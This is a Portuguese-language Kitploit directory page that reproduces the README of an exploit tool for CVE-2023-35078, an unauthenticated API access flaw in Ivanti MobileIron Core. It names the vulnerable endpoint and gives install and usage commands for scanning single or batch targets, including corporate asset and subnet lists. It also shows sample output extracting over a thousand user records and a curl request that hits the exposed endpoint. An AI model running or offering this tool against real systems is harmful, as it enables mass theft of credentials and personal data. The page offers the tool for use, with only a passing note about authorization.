Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-35078 — CVE-2023-35078 - Ivanti MobileIron Core Ferramenta de Exploit de Acesso Remoto Não Autenticado à API | Kitploit
Ferramentas/GitHubGitHub/0nsec/cve-2023-35078
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Ivanti MobileIron Core Ferramenta de Exploit de Acesso Remoto Não Autenticado à API

Ver Repositório
1há 0 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Exploração CVE-2023-35078

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Acesso Remoto Não Autenticado à API do Ivanti MobileIron Core

Python Version License CVSS Last Updated

Uma prova de conceito baseada em Python para CVE-2023-35078, visando a vulnerabilidade de Acesso Remoto Não Autenticado à API em sistemas Ivanti MobileIron Core.

Visão Geral da Vulnerabilidade

CVE-2023-35078 é uma vulnerabilidade crítica que afeta o Ivanti MobileIron Core, permitindo que invasores remotos não autenticados acessem endpoints de API sensíveis e extraiam dados de usuários sem qualquer autenticação.

  • Pontuação CVSS: 9.8 (Crítica)
  • CWE: CWE-306 (Autenticação Ausente para Função Crítica)
  • Produtos Afetados: Ivanti MobileIron Core
  • Versões Vulneráveis:
    • 11.2 (anteriores a 11.2 CU21)
    • 11.3 (anteriores a 11.3 CU18)
    • 11.4 (anteriores a 11.4 CU8)
  • Vetor de Ataque: Rede
  • Autenticação: Nenhuma Necessária
  • Interação do Usuário: Nenhuma Necessária
  • Impacto: Exposição completa dos dados do usuário

Detalhes Técnicos

A vulnerabilidade existe no mecanismo de autenticação da API do MobileIron Core, especificamente no endpoint /mifs/aad/api/v2/authorized/users. O endpoint falha em validar adequadamente os tokens de autenticação, permitindo acesso não autorizado a informações sensíveis do usuário, incluindo:

  • Credenciais do Usuário: Nomes de usuário, hashes de senha
  • Dados Pessoais: Nomes completos, endereços de e-mail, números de telefone
  • Dados Corporativos: IDs de funcionário, informações de departamento
  • Informações do Dispositivo: Dispositivos cadastrados, configurações do dispositivo
  • Dados Administrativos: Funções de usuário, permissões, associações a grupos

Instalação

Pré-requisitos

  • Python: 3.6 ou superior
  • Sistema Operacional: Linux, macOS, Windows
  • Acesso à Rede: Necessário para teste do alvo
  • Permissões: Autorização dos proprietários do sistema

Instalação Rápida

root@kitploit:~
# Clone the repository
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# Install dependencies
pip3 install -r requirements.txt

# Make executable (Linux/macOS)
chmod +x cve_2023_35078.py

Instalação Manual

root@kitploit:~
# Create project directory
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# Download the script
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# Install required packages
pip3 install requests urllib3 termcolor argparse

Instalação via Docker (Opcional)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Build and run with Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

Uso

Uso Básico

root@kitploit:~
# Test single target
python3 cve_2023_35078.py -u https://mobileiron.example.com

# Test multiple targets from file
python3 cve_2023_35078.py -f targets.txt

# Verbose mode with custom output directory
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# Custom timeout and output settings
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

Exemplos de Uso Avançado

root@kitploit:~
# Comprehensive corporate assessment
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# Single target with detailed logging
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# Batch scanning with custom timeout
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# Quick vulnerability check (no verbose output)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

Saída

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Target: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Checking version for: https://vulnerable.mobileiron.com
[*] Detected version: 11.3
[+] Target appears VULNERABLE!
[*] Attempting to exploit: https://vulnerable.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] SUCCESS! Found 1,247 users
[+] Results saved to: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Extracted 1247 user records
[*] Sample fields: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] Scan completed!
[*] Targets processed: 1
[*] Successful exploits: 1
[!] WARNING: 1 vulnerable system(s) found!
[!] Ensure proper authorization before testing!

Saída Detalhada

root@kitploit:~
[*] Checking version for: https://test.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Response length: 45,123 bytes
[*] JSON parsing successful
[*] Found user data structure with 234 records
[+] SUCCESS! Found 234 users
[*] Sample user data: {'id': '12345', 'username': '[email protected]'}
[+] Results saved to: ./results/test_mobileiron_com_20250821_055013.json

Otimizações de Desempenho

  • Pool de Conexões: Reutiliza conexões HTTP
  • Requisições Concorrentes: Processamento paralelo para múltiplos alvos
  • Timeouts Inteligentes: Timeout adaptativo baseado nos tempos de resposta
  • Gerenciamento de Memória: Manipulação eficiente de grandes conjuntos de dados
  • Limitação de Taxa: Atrasos embutidos para evitar sobrecarregar os alvos

Informações de Patch do Fornecedor

Verificação de Patch

root@kitploit:~
# Check current version
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# Verify patched endpoints return 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

Referências e Recursos

Avisos Oficiais de Segurança

  • NVD - CVE-2023-35078
  • Aviso de Segurança da Ivanti
  • Vulnerabilidades Conhecidas Exploradas pela CISA

Documentação Técnica

  • Guia de Administração do Ivanti MobileIron Core
  • Documentação da API
  • Guia de Endurecimento de Segurança

Artigos de Pesquisa e Análise

  • Análise Técnica Detalhada
  • Técnicas de Exploração
  • Relatório de Inteligência de Ameaças
Baixar ferramenta
VersãoVulnerávelPatch DisponívelNível do PatchData de Lançamento
11.2.xSimDisponívelCU21+2023-07-25
11.3.xSimDisponívelCU18+2023-07-25
11.4.xSimDisponívelCU8+2023-07-25
11.5.x+NãoN/AN/AN/A